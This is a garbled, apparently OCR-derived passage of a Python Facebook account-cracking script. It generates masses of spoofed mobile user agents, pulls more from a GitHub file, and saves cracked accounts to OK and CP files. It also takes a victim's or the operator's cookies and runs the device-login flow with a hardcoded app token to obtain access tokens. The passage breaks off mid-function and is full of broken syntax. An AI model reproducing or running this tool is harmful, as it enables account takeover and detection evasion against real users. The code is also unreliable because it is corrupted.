  Chrome/{str(rr(100,104))}.0.{str(rr(3900,4900))}.{str(rr(40,150))} Mobile Safari/537.36 NokiaBrowser/7.{str(rr(1,5))}.1.{str(rr(16,37))} {str(rc(aZ))}
 ugen3 = f"Mozilla/5.0 (Linux; U; Android {str(rr(4,12))}; {str(rc(basa))}; Redmi 5 Plus Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko)
  Version/4.0 Chrome/{str(rr(40,104))}.0.{str(rr(3900,4900))}.{str(rr(40,150))} Mobile Safari/537.36 XiaoMi/MiuiBrowser/{str(rr(1,99))}.
  {str(rc(miui_v1))}.{str(rc(miui_v2))}{str(rc(miui_v3))} {str(rc(aZ))}{str(rr(1,1000))}"
 memekk = random.choice([ugen1, ugen2, ugen3])
 ugen.append(memekk)
 for xd in range(1500):
          rr = random.randint
         rc= random choice
          an = rr(7,12)
         tg = rr(111,999)
          aa=rr(80,105)
          bb=rr(4200,5195)
          qq=rr(40,150)
          hh=rc(['QP1A.';'RKQ1.';'PPR1.';'QKQ1.';'KOT49H.';'JSS15J.';'SP1A'])
         a = rc([2.3.6;]/4.0.4]/4.2.1;]/4.2.2;]/4.3;]/4.4.2;]/4.4.4;]/5.0;]/5.0.2;]/5.1;]/5.1.1;]/6.0;]/6,]/6.0.1;]/7.0;]/7.0.1;]/7;]/8;]/8.0.1;]/9;]/10;]/11;]/12;]) \\ ronyxd = f"Mozilla/5.0 (Linux; Android {a}; R7sf Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{aa}.0.{bb}.{gg}}
  Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/315.0.0.18.109;]
          ronyxd1=f"Mozilla/5.0 (Linux; Android {an}; PDBM00 Build/{hh}180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
 Chrome/{aa}.0.{bb}.{gg} Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/342.0.0.37.119,]
          ronyxd2=f"Mozilla/5.0 (Linux; Android {an}; PECM30 Build/{hh}.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
  Chrome/{aa}.0.{bb}.{gg} Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/382.0.0.33.111;]
          ronyxd3=f"Mozilla/5.0 (Linux; Android {an}; CPH2307 Build/{hh}1.211103.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
  Chrome/{aa}.0.{bb}.{gg} Mobile Safari/537.36 GNews Android/2022089220"
          ronyxd4=f"Mozilla/5.0 (Linux; Android {an}; 21091116UG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Mobile Safari/537.36"
          ronyxd5=f"Mozilla/5.0 (Linux; Android {an}; Redmi 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.{gg} Mobile Safari/537.36
  OPR/71.3.3718.67322'
          uaku=rc([ronyxd,ronyxd1,ronyxd2,ronyxd3,ronyxd4,ronyxd5])
          ugen.append(uaku)
 for t in range(10000):
  aa='Mozilla/5.0 (Linux; Android 7.0; '
 b=random.choice(['8.1.0',4',5',6',7',8',9',10',11',12'])
 c='Hisense F102)
 d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  e=random.randrange(1, 999)
 f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.67
 h=random.randrange(73,100)
 j=random.randrange(4200,4900)
  k=random.randrange(40,150)
 I='Mobile Safari/537.36'
 uaku=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
 ugen.append(uaku)
 for x in range(10):
 a='Mozilla/5.0 (SAMSUNG: SAMSUNG-GT-S'
 b=random.randrange(100, 9999)
 c=random.randrange(100, 9999)
 d=random.choice([iA',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']) f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']) g=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  h=random.randrange(1, 9)
 i='; U; Bada/1.2; en-us) AppleWebKit/533.1 (KHTML, like Gecko) Dolfin/
 j=random.randrange(1, 9)
  k=random.randrange(1, 9)
 I='Mobile WVGA SMM-MMS/1.2.0 OPN-B'
 uak=f'{a}{b}/{c}{d}{e}{f}{g}{h}{i}{j}.{k}{l}
```

```
a='Mozilla/5.0 (Linux; Android 12;'
b=random.choice(['5.0',6.0',7.0',8.1.0',9',10',11',12'])
c=random.choice(['RMX3085)'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']) g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
i=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 11;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['M2006C3LG)'])
d=random.choice(['A','B', 'C', 'D', 'É', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 12;'
b=random.choice(['5.0',6.0',7.0',8.1.0',9',10',11',12'])
c=random.choice(['NTH-NX9)'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 12;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['Redmi Note 9 Pro)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice([A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
i=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 13;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['M2012K11C)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 6.0.1;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SM-G532G)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
j=random.randrange(4200,4900)
k=random.randrange(40,150)
```

```
I='Chrome/107.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{i}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 7.1.2;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['MI 5X; Flow)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice([A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
a='AppleWebKit/537.36 (KHTML, like Gecko)
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/347.0.0.268 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
for x in range(10):
a='Mozilla/5.0 (Linux; Android 6.0.1;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SM-G532G)'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999) f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
i=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/107.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 7.1.2;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['MI 5X; Flow)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice([A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Chrome/347.0.0.268 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 13;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['M2012K11C)'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux: Android 12:
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['Redmi Note 9 Pro)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']) g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 12;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['NTH-NX9)'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
```

```
i='0'
i=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 11;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['M2006C3LG)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'\{a\}\ \{b\};\ \{c\}\{d\}\{e\}\{f\})\ \{g\}\{h\}.\{i\}.\{j\}.\{k\}\ \{l\}^i\}
a='Mozilla/5.0 (Linux; Android 12;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['RMX3085)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 13;'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SM-A037U)'])
d=random.choice([A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
a='Mozilla/5.0 (Linux; Android 11;'
b=random.choice(['5.0',6.0',7.0',8.1.0',9',10',11',12'])
c=random.choice(['CPH2099)'])
d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
I='Chrome/112.0.0.0 Mobile Safari/537.36'
uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
ugen.append(uaku)
def uaku():
trv:
ua=open('ua2.txt','r').read().splitlines()
for ub in ua
ugen.append(ub)
a=requests.get('https://github.com/SYAHX FORCE/SYAH/blob/main/ua2.txt').text
ua=open('.ua2.txt','w')
aa=re.findall('line">(.*?)<',str(a))
for un in aa:
ua.write(un+'\n')
ua=open('.ua2.txt','r').read().splitlines()
ua = random.choice(['Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile
'Mozilla/5.0 (Linux; Android 10; SM-G996U Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Mobile Safari/537.36',
'Mozilla/5.0 (Linux; Android 10; SM-G980F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96
Mobile Safari/537.36'.
'Mozilla/5.0 (Linux; Android 6.0; iCherry C233 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36',
Mozilla/5.0 (Linux; Android 11; RMX2061 Build/RKQ1.201112.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.4606.85
Mobile Safari/537.36',
```

```
'Mozilla/5.0 (Linux; Android 13; CPH2451 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/112.0.5615.135 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/413.0.0.30.104;]',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181
Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]',
'Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0
Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZ054K) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe),
Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36',
'Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile
Safari/537.36'l)
       ---[ INDICATION ]----
cokbrut=∏
pwpluss,pwnya=[],[]
        -[ WARNA-COLOR ]-----#
P = '\x1b[1;97m'
M = '\x1b[1;91m']
H = '\x1b[1;92m']
K = '\x1b[1;93m]
B = '\x1b[1:94m]
U = '\x1b[1;95m]
0 = \frac{1}{2} 1;96m
N = '\x1b[0m'
Z = "\033[1;30m"
sir = '\033[41m\x1b[1;97m'
x = '\3[m' \# DEFAULT]
m = 'x1b[1;91m' \#RED +
k = '\033[93m' # KUNING +
h = '\x1b[1;92m' # HIJAU +
hh = '\033[32m' # HIJAU -
u = '\033[95m' # UNGU
kk = '\033[33m' # KUNING -
b = '\33[1;96m' # BIRU -
p = 'x1b[0;34m' # BIRU +
kom = " Halo. SYAH X FORCE SELAMAT MENIKMATI USERMMM"
asu = random.choice([m,k,h,u,b])
            --[ CONVERTER-BULAN ]---
dic = {'1':'January','2':'February','3':'March','4':'April','5':'May','6':'June','7':'July','8':'August','9':'September','10':'October','11':'November','12':'December',
dic2 =
{'01':January',02':February',03':March',04':April',05':May',06':June',07':July',08':August',09':September',10':October',11':November',12':Devember',
tgl = datetime.datetime.now().day
bln = dic[(str(datetime.datetime.now().month))]
thn = datetime.datetime.now().year
okc = 'OK-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'
cpc = 'CP-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'
###----- [ GET TIME ]----- ###
def waktu():
now = datetime.now()
hours = now.hour
if 4 <= hours < 12:timenow = "good morning"
elif 12 <= hours < 15:timenow = "good afternoon"
elif 15 <= hours < 18:timenow = "good evening"
else:timenow = "aood niaht"
return timenow
           --[ MACHINE-SUPPORT ]-----#
def ilman(u):
    for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.004)
def clear():
os.system('clear')
def back():
login()
           --[ LOGO-LAKNAT ]-----#
def banner():
print(f"\t{h}
CYBER
CYBER
CYBER
   ◢█▐▜█▛░▟█▐▞▜█▛▜█▙
 ▝░▊▙▗▞▊▗▔▙▊▔▙▗▔▙▊▙▊▘
    ▋╗┍╗┇<mark>┈</mark>┇┋
 ▝█▐▗▋█▐╱▝▊▛░▟█▐▗▋█▛
```

'Mozilla/5.0 (Linux; Android 12; vivo 1907 Build/SP1A.210812.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0

Chrome/112.0.5615.135 Mobile Safari/537.36',

=WELCOME

```
▲ ★★★★ ▲
    ***
   ▗▊▊▊▊▊▐▀▎▘▗▞▝▝▀▊▊▊▊█▀┐▗
Ŷ○★╬KARNA%KU╬★○Ŷ SCRIP brutal).
 RAFI X SIPERANA
♥◥▋◣▋┆┆▋◯▋▋┌◥▋♥
47L/7_L7L/700/4
\d
                    -
▊▙▗▋▋▗▔▙▊▔▙▗▔▃▊▙▊▋
   ▊▝▞▊▊▔▊▊▁▘▝▃▞▋▝▊▐
RAFI X SIPERANA
    {x}")
            --[ BAGIAN-MASUK ]-----#
def login():
trv:
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
tokenku.append(token)
sy = requests.get("https://graph.facebook.com/me?fields=id,name&access_token='+tokenku[0], cookies={'cookie':cok})
sy2 = json.loads(sy.text)['name']
sy3 = json.loads(sy.text)['id']
menu(sy2,sy3)
except KeyError:
login_lagi334()
except requests.exceptions.ConnectionError:
Ii = '# PROBLEM INTERNET CONNECTION, CHECK AND TRY AGAIN'
lo = mark(li, style='red')
sol().print(lo, style='cyan')
exit()
except IOError:
login_lagi334()
def login_lagi334():
cetak(nel('IT IS RECOMMENDED TO USE A FRESH COOKIE TO CRACK ACCOUNTS', width=90, style=f"bold purple"))
your_cookies = input(' [+] INPUT YOUR COOKIES: ')
with requests. Session() as r:
trv:
r.headers.update({'content-type': 'application/x-www-form-urlencoded',})
data = {'access_token': '867777633323150|446fdcd4a3704f64e5f6e5fd12d35d01','scope': "}
response = json.loads(r.post('https://graph.facebook.com/v2.6/device/login/', data = data).text)
code, user_code = response['code'], response['user_code']
verification_url, status_url = ('https://m.facebook.com/device?user_code={}'.format(user_code)),
('https://graph.facebook.com/v2.6/device/login_status?method=post&code=
{\}&access_token=867777633323150|446fdcd4a3704f64e5f6e5fd12d35d01&callback=LeetsharesCallback'.format(code))
r.headers.pop('content-type')
r.headers.update(('sec-fetch-mode': 'navigate', 'user-agent': 'Mozilla/5.0 (Linux; Android 9; RMX1941 Build/PPR1.180610.011; wv) AppleWebKit/537.36
(KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.54 Mobile Safari/537.36', sec-fetch-site': 'cross-site', 'Host': 'm.facebook.com', accept':
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',sec-
fetch-dest': 'document',})
response2 = r.get(verification_url, cookies = {'cookie': vour_cookies}).text
if 'HOW TO LOG IN YOUR FACEBOOK?' in str(response2) or '/login/?next=' in str(response2):
print("[+] INVALID COOKIES...", end='\r');time.sleep(3.5);print("
                                                                      ", end='\r');exit()
else:
action = re.search('action="(.*?)">', str(response2)).group(1).replace('amp;', ")
fb_dtsg = re.search('name="fb_dtsg" value="(.*?)", str(response2)).group(1)
jazoest = re.search('name="jazoest" value="(\d+)", str(response2)).group(1)
data = {'fb_dtsg': fb_dtsg,'jazoest': jazoest,'qr': 0,'user_code': user_code,}
r.headers.update({'origin': 'https://m.facebook.com',referer': verification_url,content-type': 'application/x-www-form-urlencoded','sec-fetch-site': 'same-
response3 = r.post('https://m.facebook.com{}'.format(action), data = data, cookies = {'cookie': your_cookies})
if 'https://m.facebook.com/dialog/oauth/?auth_type=rerequest&redirect_uri=' in str(response3.url):
r.headers.pop('content-type');r.headers.pop('origin')
response4 = r.post(response3.url, data = data, cookies = {'cookie': your_cookies}).text
action = re.search('action="(.*?)", str(response4)).group(1).replace('amp;', ")
fb_dtsg = re.search('name="fb_dtsg" value="(.*?)", str(response4)).group(1) jazoest = re.search('name="jazoest" value="(\d+)", str(response4)).group(1)
scope = re.search('name="scope" value="(.*?)", str(response4)).group(1)
```

```
display = re.search('name="display" value="(.*?)", str(response4)).group(1) user_code = re.search('name="user_code" value="(.*?)", str(response4)).group(1)
